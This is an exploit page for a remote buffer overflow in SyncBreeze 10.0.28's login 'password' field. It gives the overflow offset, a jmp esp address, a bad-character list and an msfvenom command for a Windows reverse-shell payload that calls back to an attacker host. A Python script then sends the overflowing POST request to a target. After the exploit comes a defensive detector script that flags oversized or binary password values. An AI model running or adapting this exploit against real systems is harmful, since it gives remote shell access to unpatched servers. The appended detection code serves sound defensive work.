
SyncBreeze 10.0.28 password Remote Buffer Overflow

2020-11-25 21:57
# Exploit Title: SyncBreeze 10.0.28 - 'password' Remote Buffer Overflow
# Date: 18-Sep-2020
# Exploit Author: Abdessalam king(A.salam)
# Vendor Homepage: http://www.syncbreeze.com
# Software Link: http://www.syncbreeze.com/setups/syncbreezeent_setup_v10.0.28.exe
# Version: 10.0.28
# Tested on: Windows 7, Windows XP, Windows 10
#72413372 [*] Exact match at offset 520
#jmp esp FFE4 \xff\xe4
#!mona modules
#!mona find -s "\xff\xe4" -m libspp.dll
#address esp => 10090C83
#badchars ==> "\x00\x0a\x0d\x25\x26\x2b\x3d"
#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.199 LPORT=1337 -f c -b "\x00\x0a\x0d\x25\x26\x2b\x3d" EXITFUNC=thread
#!/usr/bin/python
import socket

# Shellcode buffer: filled with the bytes emitted by the msfvenom command above.
shell = ""

# 520 filler bytes, the jmp esp address in libspp.dll (little-endian), a NOP sled,
# the shellcode, then NOP padding up to a fixed 1400-byte password value.
payload = "username=AAAAA&password=" + "A" * 520 + "\x83\x0c\x09\x10" + "\x90" * 20 + shell + "\x90" * (1400 - 520 - 4 - 20 - len(shell))

req = ""
req += "POST /login HTTP/1.1\r\n"
req += "Host: 192.168.1.20\r\n"
req += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0\r\n"
req += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
req += "Accept-Language: en-US,en;q=0.5\r\n"
req += "Accept-Encoding: gzip, deflate\r\n"
req += "Referer: http://192.168.1.20/login\r\n"
req += "Content-Type: application/x-www-form-urlencoded\r\n"
req += "Content-Length: " + str(len(payload)) + "\r\n"
req += "Connection: keep-alive\r\n"
req += "Upgrade-Insecure-Requests: 1\r\n"
req += "\r\n"
req += payload

# print req
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.1.20", 80))
s.send(req)
print s.recv(1024)
s.close()
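
A defender-side check for the request this script sends, as an added example that is not part of the original exploit or of SyncBreeze: it inspects a raw `POST /login` request and flags a `password` field that is oversized, reaches the 520-byte offset stated in the header, or carries raw binary bytes. `MAX_PASSWORD_LEN`, the function names and the sample host are assumptions; the sample requests are constructed, not captured traffic.

```python
OVERFLOW_OFFSET = 520    # from the page: "Exact match at offset 520"
MAX_PASSWORD_LEN = 128   # assumed policy limit, tune per deployment


def inspect_login_request(raw):
    """Return a list of findings for one raw HTTP request given as bytes."""
    head, _, body = raw.partition(b"\r\n\r\n")
    request_line = head.split(b"\r\n", 1)[0].split()
    if len(request_line) < 2 or request_line[0] != b"POST":
        return []
    if request_line[1].split(b"?", 1)[0] != b"/login":
        return []
    findings = []
    # Split on raw bytes instead of URL-decoding: the page's bad-character list
    # contains '&' (0x26) and '=' (0x3d), so a payload built to that list keeps
    # the form-field boundaries intact and its full length is visible here.
    for field in body.split(b"&"):
        name, _, value = field.partition(b"=")
        if name != b"password":
            continue
        if len(value) > MAX_PASSWORD_LEN:
            findings.append("password length %d exceeds limit %d"
                            % (len(value), MAX_PASSWORD_LEN))
        if len(value) >= OVERFLOW_OFFSET:
            findings.append("password reaches the %d-byte overflow offset"
                            % OVERFLOW_OFFSET)
        # A browser percent-encodes non-ASCII input, so raw bytes outside
        # printable ASCII in this field are anomalous.
        if any(b < 0x20 or b > 0x7E for b in value):
            findings.append("password contains raw non-printable bytes")
    return findings


def build_request(password):
    """Constructed sample request for the demo (not captured traffic)."""
    body = b"username=alice&password=" + password
    return (b"POST /login HTTP/1.1\r\n"
            b"Host: syncbreeze.example\r\n"
            b"Content-Type: application/x-www-form-urlencoded\r\n"
            b"Content-Length: " + str(len(body)).encode() + b"\r\n\r\n" + body)


if __name__ == "__main__":
    samples = {"normal": b"S3cure-pass", "oversized": b"A" * 600 + b"\x90" * 8}
    for label, password in samples.items():
        print(label, inspect_login_request(build_request(password)))
```

The same three conditions translate directly into a WAF or IDS rule on the request body; a length cap on `password` well below 520 bytes is the one that blocks the request shape shown above.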


Source: 8020110202-BLW/eussi/moc.ytirucesxc
